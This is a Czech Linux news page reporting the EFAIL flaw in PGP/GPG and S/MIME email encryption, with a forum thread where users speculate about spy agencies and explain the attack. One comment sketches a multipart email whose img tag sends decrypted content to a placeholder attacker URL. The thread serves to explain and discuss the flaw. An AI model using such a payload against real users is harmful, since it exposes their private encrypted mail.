abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
dnes 11:44 | Zajímavý článek

Jiří Eischmann na svém blogu popisuje své zkušenosti s Fedora Silverblue. Jedná se o neměnný systém s atomickými aktualizacemi, tj. základní systém je distribuován jako celek. Myšlenka neměnného systému se ve Fedoře začala rozvíjet v projektu Atomic. Z něj se časem vyvinul na desktop zaměřený Atomic Workstation a nově projekt s vlastním brandingem Team Silverblue. Základním stavebním kamenem je OSTree, což je velmi zjednodušeně takový git pro souborový systém.

Ladislav Hagara | Komentářů: 0
dnes 00:11 | Komunita

Richard Hughes na svém blogu informuje, že do LVFS (Linux Vendor Firmware Service) plánuje přidat podporu aktualizace NVMe (NVM Express) firmwarů. Současně žádá o pomoc: odeslání výstupu příkazu nvme-cli.

Ladislav Hagara | Komentářů: 0
včera 16:33 | Nová verze

Byla vydána verze 1.0 frameworku Flatpak (Wikipedie), tj. technologie umožňující distribuovat aplikace v podobě jednoho instalačního souboru na různé linuxové distribuce a jejich různá vydání. Přehled novinek na GitHubu. S vydáním Flatpaku 1.0 byla odstraněna nálepka "beta" u centrálního repozitáře pro Flatpaky Flathub.

Ladislav Hagara | Komentářů: 0
včera 12:33 | Nová verze

Byla vydána nová verze 2.10.6 svobodné aplikace pro úpravu a vytváření rastrové grafiky GIMP. Přehled novinek i s náhledy v oznámení o vydání a v souboru NEWS. Zdůraznit lze možnost psaní textů vertikálně nebo filtr pro vytváření obrázků typu Little Planet. Vývojáři zdůrazňují překlad GIMPu do maráthštiny. GIMP je tak k dispozici již v 81 jazycích.

Ladislav Hagara | Komentářů: 7
včera 12:00 | Nová verze

Vyšla verze 5.17 prohlížeče map a GPS logů GPXSee. Nová verze přináší zejména podporu HiDPI displejů a map, a podporu pro další dva formáty souborů - SLF a LOC.

Martin Tůma | Komentářů: 0
18.8. 22:22 | Nová verze

Po roce vývoje od vydání verze 1.20 byla vydána verze 1.21 knihoven EFL (Enlightenment Foundation Libraries). Do vývoje EFL se zapojilo 96 vývojářů. Provedeno bylo téměř 5 000 commitů.

Ladislav Hagara | Komentářů: 0
16.8. 19:00 | Nová verze

Byla vydána verze 18.08.0 KDE Aplikací (KDE Applications). Přehled novinek v kompletním seznamu změn a na stránce s dalšími informacemi.

Ladislav Hagara | Komentářů: 0
16.8. 18:44 | Pozvánky

Spolek OpenAlt zve příznivce otevřených řešení a přístupu na 155. brněnský sraz, který proběhne v pátek 17. srpna od 18:00 na zahrádce restaurace Tanganika (Horova 35). V případě nepřízně počasí uvnitř. Tentokrát bude sraz pojat tématicky. Vzhledem k blížícímu se 50. výročí invaze vojsk Varšavské smlouvy do Československa proběhne malá výstava. Kromě literatury budou k vidění též originály novin z 21. srpna 1968, dosud nikde nezveřejněné fotky okupovaného Brna a původní letáky rozdávané v ulicích.

Ladislav Hagara | Komentářů: 0
16.8. 01:00 | Komunita

Měsíc po Slackware slaví 25 let také Debian. Přesně před pětadvaceti lety, 16. srpna 1993, oznámil Ian Murdock vydání "Debian Linux Release".

Ladislav Hagara | Komentářů: 10
15.8. 06:00 | Nová verze

Byla vydána nová verze 1.26 editoru zdrojových kódů Visual Studio Code (Wikipedie). Přehled novinek i s náhledy a animovanými gify v poznámkách k vydání. Představení novinek také na YouTube.

Ladislav Hagara | Komentářů: 28
Používáte zařízení („chromebook“, „chromebox“ či tablet) s ChromeOS?
 (6%)
 (3%)
 (15%)
 (76%)
Celkem 225 hlasů
 Komentářů: 10, poslední 18.8. 11:25
    Rozcestník

    Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

    Zítra v 9:00 budou zveřejněny informace o "vážné bezpečnostní chybě" v šifrování pošty pomocí PGP/GPG i S/MIME. EFF (Electronic Frontier Foundation) na svém blogu doporučuje okamžité zakázání automatického dešifrování zpráv nebo raději i odinstalování nástrojů pro dešifrování. Werner Koch, hlavní vývojář GnuPG, i další odborníci považují zprávu za nafouklou bublinu.

    14.5. 11:22 | Ladislav Hagara | Bezpečnostní upozornění


    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    Slavko avatar 14.5. 11:46 Slavko
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Hmm, že by boli CIA, NSA a podobné dobré troj-písmenkové organizácie vážne znepokojené narastajúcim počtom šifrovaných správ?
    Conscript89 avatar 14.5. 12:07 Conscript89 | Brno
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Stejne jako treba FSB, ze? :)
    I can only show you the door. You're the one that has to walk through it.
    Conscript89 avatar 14.5. 12:13 Conscript89 | Brno
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Akorat co se tyka v tomto pripade je to co se tyce NSA, CIA spekulace, narozdil od FSB ktera dala primo "pokyn" zakazat telegram.
    I can only show you the door. You're the one that has to walk through it.
    Slavko avatar 14.5. 15:56 Slavko
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Síce neviem o tom, že by bol akýsi Telegram zakázaný v SR či ČR, ani že by FSB odporúčala okamžite prestať šifrovať, ale inak áno - je to špekulácia, lebo dobré troj-písmenkové organizácie nemajú odvahu urobiť to otvorene, ale získavajú prístup cez nastrčené organizácie, ako napr. súkromné kľúče prostredníctvom metrík Windows...

    Mimochodom, i dobré troj-písmenkové organizácie z USA majú podobný prístup zabezpečený ich federálnym zákonom, ale o tom sa taktne mlčí, pretože mlčanie nie je dezinformácia, že... Alebo ste nečítali veci, ktoré vyšli najavo vďaka zlému Snowdenovi?
    14.5. 21:12 Peter Golis | skóre: 56 | Bratislava
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    To je ten komunista?
    Jendа avatar 14.5. 17:43 Jendа | skóre: 74 | blog: Výlevníček | JO70FB
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Kdyby tohle objevila NSA, tak si to schová jako 0day a nebude to zveřejňovat.
    wget -q -O - https://psp.cz/ | head -n 19
    Marián Kyral avatar 15.5. 10:58 Marián Kyral | skóre: 29 | blog: Sem_Tam | Frýdek-Místek
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    A myslíš, že o tom ještě neví?
    14.5. 12:08 elenril
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Aha, takže v podstatě je to jen "HTML email je zlo a neměl by se používat", ale "security researchers" kolem toho potřebují udělat cirkus.
    14.5. 14:20 Lyco | skóre: 12 | blog: Lyco
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Protože už jsou k dispozici informace, tak přidávám shrnutí:

    Je to kombinace několika věcí:
    1. mailové čtečky stahují automaticky vzdálený obsah
    2. některé mailové čtečky neberou ohled na bezpečnostní interakce zašifrovaného a nezašifrovaného obsahu: můžu v plaintextu otevřít tag img, do src vložit zašifrovaný obsah (pomocí MIME multipart) a v plaintextu zase img zavřít. Voila: v logu webserveru najdu rozšifrovaný obsah.
    3. I pokud je klient rozumný, dá se udělat útok na kryptografii: používá se neautentizovaný mód CBC (nebo jeho dvojče, CFB). Útočník, pokud správně uhodne plaintext prvního bloku (a to typicky dokáže), může zkonstruovat blok který se rozšifruje na známou hodnotu. Tím vloží do plaintextu tag img a zbytek nechá normálně rozšifrovat jako výše.
    Vysvětlení Odborný článek
    Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.
    Jendа avatar 14.5. 17:42 Jendа | skóre: 74 | blog: Výlevníček | JO70FB
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    TL;DR. ELI5: Vyrobíš multipart zprávu s
    <img src="https://útočník/?m=
    ----BOUNDARY
    -----BEGIN PGP MESSAGE-----
    ...
    -----END PGP MESSAGE-----
    ----BOUNDARY
    ">
    Poštovní klient ten vnitřek rozšifruje, sestaví z toho dokument, a pokud povolíš nahrávání vzdálených obrázků (což lze zařídit třeba tím, že tuhle věc přilepíš do newsletteru z Alzy), tak se GETne ten tajný obsah. Nejspíš to selže pokud v šifrované zprávě budou uvozovky.
    wget -q -O - https://psp.cz/ | head -n 19
    14.5. 20:20 pc2005 | skóre: 36 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Poštovní klient ten vnitřek rozšifruje
    Tak to je facepalm.
    Jendа avatar 14.5. 21:42 Jendа | skóre: 74 | blog: Výlevníček | JO70FB
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Myslíš tím že by klient neměl rozšifrovat zprávu když je jenom částečně šifrovaná? Často totiž nemáš jinou možnost - například různé mailing listy, které přidávají patičky.
    wget -q -O - https://psp.cz/ | head -n 19
    15.5. 09:54 pc2005 | skóre: 36 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    No dovedu si představit, že by přesunul ten šifrovanej obsah do speciální oblasti a izoloval jí od okolí.
    Josef Kufner avatar 15.5. 10:01 Josef Kufner | skóre: 68
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    V první řadě je prasárna cpát šifrovaný text do plain-text těla mailu. Pokud se dá do samostatné multipart části, tak konference patičku přihodí jako další textovou část a nic se nerozbije (přijde multipart zpráva s dvěma těly - jedno šifrované a druhé nikoliv).
    Hello world ! Segmentation fault (core dumped)
    15.5. 12:56 Lyco | skóre: 12 | blog: Lyco
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Ta chyba je na efail.de popsaná právě pro multipart maily.

    Skutečný problém je v tom, že to klient spojí a interpretuje jako celek, přestože jsou tam hranice (dané šifrováním) které nelze bezpečně překročit.
    Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.
    14.5. 17:53 petr
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    at nemusite cekat https://efail.de/efail-attack-paper.pdf

    Založit nové vláknoNahoru


    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.